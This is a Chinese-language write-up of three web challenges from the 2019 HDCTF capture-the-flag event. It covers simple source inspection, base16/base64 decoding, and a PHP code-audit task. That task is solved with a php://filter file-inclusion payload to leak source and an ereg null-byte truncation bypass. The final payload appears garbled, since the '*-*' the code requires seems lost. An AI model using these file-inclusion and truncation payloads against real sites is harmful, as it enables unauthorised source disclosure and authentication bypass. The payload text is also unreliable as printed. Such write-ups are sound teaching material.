WEB

签到题

打开题目

image.png

0改成1

image.png

查看源码，有flag

测试你与flag的缘分

题目

image.png

打开flag.txt ，一段js密码，解密是一串base16，再解是qp，最后，假的密码
回到题目，查看源码，发现一段base16

image.png

解密，解出来是base64，解两次，flag

简单的代码审计

打开题目一片空白,查看源码

image.png

image.png

题目是代码审计，php伪协议，

file=php://filter/read=convert.base64-encode/resource=once.php

image.png

出来一串base64

PGh0bWw+PGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1HQksiPg0KCTx0aXRsZT5PbmNlIE1vcmU8L3RpdGxlPg0KPC9oZWFkPg0KPGJvZHk+PGJyPg0KPGNlbnRlcj4NCjxwPllvdSBwYXNzd29yZCBtdXN0IGJlIGFscGhhbnVtZXJpYzwvcD48YnI+DQo8Zm9ybSBtZXRob2Q9ImdldCI+DQoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBhc3N3b3JkIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPjxicj48YnI+DQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNoZWNrIj4NCjwvZm9ybT4NCjxocj48YnI+DQo8L2JvZHk+PC9odG1sPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsgDQppbmNsdWRlX29uY2UoJy4vZmxhZy9mbGFnMC5waHAnKTsNCmlmIChpc3NldCAoJF9HRVRbJ3Bhc3N3b3JkJ10pKSB7DQoJaWYgKGVyZWcgKCJeW2EtekEtWjAtOV0rJCIsICRfR0VUWydwYXNzd29yZCddKSA9PT0gRkFMU0UpDQoJew0KCQllY2hvICc8cD5Zb3UgcGFzc3dvcmQgbXVzdCBiZSBhbHBoYW51bWVyaWM8L3A+JzsNCgl9DQoJZWxzZSBpZiAoc3RybGVuKCRfR0VUWydwYXNzd29yZCddKSA8IDggJiYgJF9HRVRbJ3Bhc3N3b3JkJ10gPiA5OTk5OTk5OTkpDQoJew0KCQlpZiAoc3RycG9zICgkX0dFVFsncGFzc3dvcmQnXSwgJyotKicpICE9PSBGQUxTRSkNCgkJew0KCQkJZGllKCdGbGFnOiAnIC4gJGZsYWcpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJZWNobygnPHA+Ki0qIGhhdmUgbm90IGJlZW4gZm91bmQ8L3A+Jyk7DQoJCX0NCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAnPHA+SW52YWxpZCBwYXNzd29yZDwvcD4nOw0KCX0NCn0NCj8+DQo=

base 64解密出来



    Once More




You password must be alphanumeric



    


    




You password must be alphanumeric';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 999999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('*-* have not been found');
        }
    }
    else
    {
        echo 'Invalid password';
    }
}
?>

ereg():输入的password必须是大小写字母和数字
strlen（）：输入值必须大于999999999并且长度小于8
strops():输入的值中必须含有 * - *
利用ereg函数的截断漏洞可以构造playload:1e9%00-
得到flag

image.png

2019-05-18 HDCTF

WEB

签到题

测试你与flag的缘分

简单的代码审计

你可能感兴趣的:(2019-05-18 HDCTF)